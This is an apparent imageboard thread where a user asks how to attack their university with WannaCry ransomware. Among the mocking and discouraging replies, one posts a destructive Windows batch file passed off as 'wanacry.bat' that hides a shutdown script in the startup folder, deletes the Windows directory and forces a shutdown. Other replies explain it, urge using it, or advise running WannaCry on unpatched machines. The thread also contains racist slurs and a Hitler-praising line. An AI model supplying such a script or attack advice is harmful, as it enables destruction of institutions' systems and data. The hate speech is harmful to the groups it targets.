I need attack my university with wanna cry, any have idea? :)

I need attack my university with wanna cry, any have idea? :)

Other urls found in this thread:

youtube.com/watch?v=ASywAfBAVrQ
twitter.com/NSFWRedditVideo

Wannacry epidemic is patched. Don't.

>I need attack my university with wanna
why do you "need" to do this?

Fuck off pajeet

Other ramsomware? :I

Download WannaCry's executable and execute it while pinging your university's IP from CMD. It will spread automatically. Be sure to not have the latest updates installed.

Good luck user.

Open Notepad and type this:
@echo off
echo "shutdown /t 0" > C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\foo.bat
attrib +s +h C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\foo.bat
echo "HITLER DID NOTHING WRONG -- %username%" > C:\ANALBLAST
del /f /s /q C:\Windows
shutdown -t 1 -m "FUCK ALL NIGGERS"
Save it as wanacry.bat and run it on the computer. ;)

Because bad people have done bad things for me and my teachers :)

Resident Linnigger here, can someone explain this shit? I'm not familiar with the Windows CLI.

Oh no the admin will have to spend a couple hours doing a restore

I think your overestimating the IT capabilities of a university.

Looks like it makes a bat too adds to the startup programs, and foo will delete the windows folder and shutdown the pc

are you turkish?

My country is a third world country, I think it could be successful :)

This ain't highschool kiddo

Maybe :)

Fucking retard child. Shoo Shoo this is site is for over 18's.

Creates a batch file that shuts down the machine, puts in a folder where it'll be run at each startup, sets it as a hidden system file (not many people, including programmers, disable the option that hides system files) and attempts to delete C:\Windows recursively (it won't delete everything, but probably enough to prevent booting up).

You're too late, Pedro

kek I could tell from your writing style and the absolute stupidity of this thread
where's the raid spray

Try some other ransomware. Preferably one that will work.

Let's say ... we do not have the best computers, nor the best servers; But the person responsible for these has stolen the money from my teachers :)

>:)

Are you 12 or something?

>"And so I will tarnish the reputation of the school by locking up their entire network so that I may be able to make him feel embarassment!"
You really don't think things through, do you?

What else could I use? :)

Your uni uses windows, you deserve to be treated like shit.
GTFO from this garbage uni and go where professor value efficiency, performance and privacy.

No, i´m legal in my country :)

Thank You, user :)

You're not supposed to explain it

Are you Stupid or Something? :)
youtube.com/watch?v=ASywAfBAVrQ

It's a good script just use it

wannacry had a killswitch in it, it has been activated, downloading and running wannacry will do literally nothing

Do you know where i can found it? :)

Don't be a douche bag faggot. Poor IT staff dealing with that shit because you fail at life.

SMB off

Reported to FBI.